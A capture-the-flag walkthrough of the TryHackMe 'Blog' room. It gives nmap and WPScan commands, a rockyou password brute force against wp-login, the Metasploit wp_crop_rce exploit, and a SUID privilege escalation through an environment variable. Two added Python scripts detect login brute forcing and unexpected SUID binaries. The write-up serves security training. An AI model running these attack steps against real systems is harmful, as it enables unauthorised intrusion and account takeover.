Swafox Blog
TryHackMe - Blog

Basic information
Room name: Blog
Description: Billy Joel made a WordPress blog!
Difficulty: Medium
Room link: tryhackme.com/room/blog
Step 1 - Reconnaissance
Don't forget to add blog.thm to your /etc/hosts file!
Let's start off with a simple nmap scan.
~# nmap -sV -p- -T5 blog.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel
It looks like we have SSH, HTTP, and two SMB ports open. Since this is a WordPress exploitation room, we can confidently skip Samba enumeration. (Note: this does not apply to other rooms; skipping is safe here only because the SMB ports in this room are rabbit holes.)
Let's browse to the HTTP port and enumerate from there.
Step 2 - WordPress Enumeration
As usual, we need to start with user enumeration.
wpscan --url blog.thm -e u
# --url = specify url
# -e = enumerate users (u)
After a quick scan we get exactly two valid usernames.
Note: even though WPScan identifies four users, only two of them appear to be real accounts, with nicknames, some basic information and an API reference.
Step 3 - WordPress Bruteforce
Now that we have two valid usernames, we can start a simple wp-login brute force. Run the command below and give it about 2-3 minutes, then stop it with Ctrl+C and you'll be good to go.
wpscan --url blog.thm -U bjoel,kwheel -P /usr/share/wordlists/rockyou.txt --password-attack wp-login -t 64
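From the defender's side, the wpscan password attack above shows up in the web server log as a burst of POST requests to wp-login.php from one address, each answered with HTTP 200 (WordPress re-serves the login form on a wrong password; a successful login redirects with 302). The script below is an added example, not part of the original write-up: it parses Apache combined-format access log lines and flags any client that produces a configurable number of failed logins inside a time window. The log lines are constructed for the example, and the threshold and window are assumptions to tune per site.

```python
"""Flag wp-login.php brute forcing in Apache combined-format access logs.

Added example for this write-up, not code from the room or from WPScan.
All log lines below are constructed sample data.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: ip ident user [ts] "METHOD PATH PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for a well-formed combined-log line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def is_failed_login(rec):
    """WordPress answers a wrong password on wp-login.php with 200 (the form again);
    a correct one is a 302 redirect to wp-admin, so 200 on a POST is a failure."""
    path = rec["path"].split("?", 1)[0]
    return rec["method"] == "POST" and path.endswith("/wp-login.php") and rec["status"] == 200


def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Return {ip: {...}} for every client with >= threshold failed logins inside `window`."""
    attempts = defaultdict(list)
    agents = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and is_failed_login(rec):
            attempts[rec["ip"]].append(rec["ts"])
            agents[rec["ip"]].add(rec["ua"])

    hits = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        # Sliding window: do any `threshold` consecutive failures fit inside `window`?
        for i in range(len(stamps) - threshold + 1):
            if stamps[i + threshold - 1] - stamps[i] <= window:
                hits[ip] = {"failed_logins": len(stamps), "user_agents": sorted(agents[ip])}
                break
    return hits


def _line(ip, second, method, path, status, ua):
    """Build one constructed combined-format log line at 10:00:<second>."""
    ts = f"12/Jan/2021:10:00:{second:02d} +0000"
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 3254 "-" "{ua}"'


# Constructed sample: 30 failed logins in 30 seconds from one scanner, plus a
# legitimate user who mistypes once and then logs in successfully.
SAMPLE_LOG = (
    [_line("10.10.14.5", s, "POST", "/wp-login.php", 200, "WPScan (sample)") for s in range(30)]
    + [
        _line("192.168.1.20", 5, "GET", "/", 200, "Mozilla/5.0"),
        _line("192.168.1.20", 40, "POST", "/wp-login.php", 200, "Mozilla/5.0"),
        _line("192.168.1.20", 41, "POST", "/wp-login.php", 302, "Mozilla/5.0"),
    ]
)

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failed_logins']} failed wp-login.php POSTs, UA {info['user_agents']}")
```

The same logic works on a real access.log read line by line; the only site-specific parts are the threshold, the window, and the path check if WordPress is installed under a sub-directory.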
Step 4 - User
Now that we have valid credentials, we can log in to the account. A quick look around shows that the site runs WordPress version 5. A little research led me to CVE-2019-8943, which covers a path traversal and a local file inclusion vulnerability. Conveniently, this vulnerability has a Metasploit module:
exploit/multi/http/wp_crop_rce
Let's use the retrieved credentials to run the exploit. Your settings should look like this:
For ease of use, run the shell command and upgrade to a TTY shell using:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Step 5 - Privilege escalation
Both user.txt and root.txt will be available once we get root.
Let's look at the SUID files to find a possible privilege escalation vector. Run a simple SUID search using:
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
The one that really stands out is /usr/sbin/checker. It is not a standard system binary, and it carries the SUID bit.
Download the executable using Meterpreter's download function and load it into a decompiler (Ghidra or Cutter). The main function looks like this:
This single function checks whether the environment variable admin (via getenv) is equal to 0 (NULL). That means setting it to anything else should give us root!
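Spotting /usr/sbin/checker by eye works on a small list, but the reliable way to notice a binary like this is to diff the SUID inventory against a baseline of what the distribution is expected to ship. The script below is an added example, not part of the original write-up: it parses the `ls -ld` lines produced by the find command above, keeps only setuid-root entries, and reports any path missing from a baseline set. The baseline here is an assumed, deliberately short list of stock Ubuntu SUID binaries (a real audit would generate it from a known-good host or the package database), and the input lines are constructed sample output.

```python
"""Audit `find / -perm -4000 -exec ls -ld {} \\;` output against a SUID baseline.

Added example for this write-up, not code from the room. The baseline set and
the sample ls output are constructed; only /usr/sbin/checker comes from the post.
"""
import re
from dataclasses import dataclass

MODE_RE = re.compile(r"[-bcdlps][rwxsStT-]{9}[.+]?")


@dataclass
class SuidEntry:
    mode: str
    owner: str
    group: str
    path: str


def parse_ls_line(line):
    """Parse one `ls -l` line: mode links owner group size month day year-or-time path.
    The path is taken as everything after the eighth field so spaces survive."""
    fields = line.split(maxsplit=8)
    if len(fields) < 9 or not MODE_RE.fullmatch(fields[0]):
        return None
    return SuidEntry(mode=fields[0], owner=fields[2], group=fields[3], path=fields[8])


def is_setuid_root(entry):
    """The setuid bit shows as 's' (or 'S' without execute) in the owner execute slot."""
    return entry.owner == "root" and entry.mode[3] in "sS"


# Assumed baseline: a handful of SUID-root binaries a stock Ubuntu install ships.
# Generate this from a trusted reference host in practice rather than hand-typing it.
EXPECTED_SUID_ROOT = {
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/usr/bin/su",
    "/usr/bin/chsh",
    "/usr/bin/chfn",
    "/usr/bin/gpasswd",
    "/usr/bin/newgrp",
    "/bin/mount",
    "/bin/umount",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}


def audit_suid(lines, baseline=EXPECTED_SUID_ROOT):
    """Return the setuid-root paths in `lines` that are not in `baseline`."""
    unexpected = []
    for line in lines:
        entry = parse_ls_line(line)
        if entry is None or not is_setuid_root(entry):
            continue
        if entry.path not in baseline:
            unexpected.append(entry.path)
    return unexpected


# Constructed sample output of the find command; sizes and dates are made up.
SAMPLE_LS_OUTPUT = [
    "-rwsr-xr-x 1 root root 44664 Jan 25  2019 /usr/bin/passwd",
    "-rwsr-xr-x 1 root root 149080 Jan 31  2020 /usr/bin/sudo",
    "-rwsr-xr-- 1 root messagebus 42992 Jun 11  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "-rwxr-xr-x 1 root root 12345 Jun 11  2019 /usr/bin/not-suid-at-all",
    "-rwsr-xr-x 1 root root 8392 May 26  2020 /usr/sbin/checker",
    "garbage line that is not ls output",
]

if __name__ == "__main__":
    for path in audit_suid(SAMPLE_LS_OUTPUT):
        print(f"unexpected setuid-root binary: {path}")
```

On a live host, pipe the find command's output into this script instead of the constructed list; anything it prints deserves the same scrutiny the post gives /usr/sbin/checker.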
export admin=abc
./checker
Bingo! We got root. Now find the user.txt file using the following command:
find / -name "user.txt" 2>/dev/null
That's all! Thanks for reading :)